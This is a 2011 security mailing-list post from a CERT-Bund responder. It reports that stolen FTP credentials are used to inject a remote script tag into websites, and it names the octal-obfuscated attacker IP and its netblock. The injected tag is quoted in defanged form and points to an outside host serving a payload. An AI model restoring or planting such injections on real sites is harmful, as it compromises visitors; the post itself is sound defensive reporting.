[nsp-sec] Stolen FTP credentials
Thomas Hungenberg
th.lab at hungenberg.net
Wed Mar 16 11:16:30 EDT 2011
It appears the stolen FTP credentials are used to inject the following code
into corresponding websites (XXX inserted):
<scrXXipt src='htXXXtp://0133.0331.0242.0034/0314.php?js'></scrXXXipt>
0133.0331.0242.0034 = 91.217.162.28
Known rogue netblock:
inetnum: 91.217.162.0 - 91.217.162.255
netname: VOEJNA-NET
descr: Voejkova Nadezhda
country: UA
Cheers,
Thomas
Thomas Hungenberg schrieb:
> ----------- nsp-security Confidential --------
>
> Hi,
>
> please find below a list of stolen FTP credentials found in recent dropzone data.
>
> Format: ASN | IP | CC | hostname | username | sanitized password
>
>
> - Thomas
>
> CERT-Bund Incident Response & Anti-Malware Team
More information about the nsp-security
mailing list